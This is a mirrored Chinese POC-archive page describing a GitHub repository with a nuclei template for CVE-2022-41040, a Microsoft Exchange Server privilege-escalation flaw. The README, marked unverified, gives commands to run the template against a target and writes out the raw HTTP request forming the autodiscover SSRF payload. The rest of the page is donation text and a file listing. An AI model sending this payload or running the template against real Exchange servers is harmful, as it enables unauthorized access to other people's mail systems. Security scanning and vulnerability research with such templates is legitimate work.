支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: c862a95f37bb0ad5c126d11e18b65adfb21245b7

来源
https://github.com/numanturle/CVE-2022-41040
关联漏洞
标题:Microsoft Exchange Server 代码问题漏洞 (CVE-2022-41040)
POC 描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server存在安全漏洞。攻击者利用该漏洞提升权限。
POC 描述
CVE-2022-41040 nuclei template
介绍
# CVE-2022-41040
CVE-2022-41040 nuclei template

* Unverified!


# Usage 

```
git clone https://github.com/numanturle/CVE-2022-41040
cd CVE-2022-41040
nuclei -u https://target -t owa.yaml
```

```
GET /autodiscover/autodiscover.json?@mail.xxx/BACKENDAPI?&Email=autodiscover/autodiscover.json%3f@mail.xxx HTTP/1.1
Host: mail.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: */*
Connection: close


```

![img](https://github.com/numanturle/CVE-2022-41040/blob/main/img/ss1.png?raw=true)
![img](https://github.com/numanturle/CVE-2022-41040/blob/main/img/ss2.png?raw=true)
![img](https://github.com/numanturle/CVE-2022-41040/blob/main/img/ss3.png?raw=true)




# Reference 

https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
文件快照

 [4.0K]  /data/pocs/c862a95f37bb0ad5c126d11e18b65adfb21245b7
├── [4.0K]  img
│   ├── [   6]  readme.md
│   ├── [212K]  ss1.png
│   ├── [222K]  ss2.png
│   └── [106K]  ss3.png
├── [ 512]  owa.yaml
└── [ 891]  README.md

1 directory, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。